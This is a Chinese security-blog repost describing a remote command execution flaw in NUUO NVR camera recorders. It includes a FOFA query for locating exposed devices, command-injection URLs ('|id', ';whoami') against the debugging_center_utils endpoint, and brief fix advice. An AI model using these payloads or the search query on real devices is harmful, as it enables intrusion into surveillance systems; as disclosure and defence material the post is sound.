NUUO摄像头远程命令执行漏洞

admin 2024年10月30日10:06:18评论30 views字数 415阅读1分23秒阅读模式
简介
NUUO NVR是一款用于监控和视频管理的设备,通常与IP摄像头配合使用。它能够实时录制、存储和管理来自多个摄像头的视频流。NUUO NVR支持多种视频编码格式,并提供了丰富的功能,如运动检测、事件触发、远程访问、云存储等。
漏洞描述
NUUO NVR摄像头在debugging_center_utils接口处存在远程命令执行,攻击者可通过该漏洞在服务器上执行任意命令,获取服务器权限。
fofa语法
title="Network Video Recorder Login"
漏洞复现
/__debugging_center_utils___.php?log=|id/__debugging_center_utils___.php?log=;whoami
NUUO摄像头远程命令执行漏洞
NUUO摄像头远程命令执行漏洞
批量检测(批量检测POC工具请前往知识星球获取):
NUUO摄像头远程命令执行漏洞
修复建议
1、禁⽌公⽹访问该系统。
2、及时升级产品到最新版本。
网安交流群

原文始发于微信公众号(白帽攻防):【漏洞复现】NUUO摄像头远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月30日10:06:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   NUUO摄像头远程命令执行漏洞http://cn-sec.com/archives/3332178.html

发表评论

匿名网友 填写信息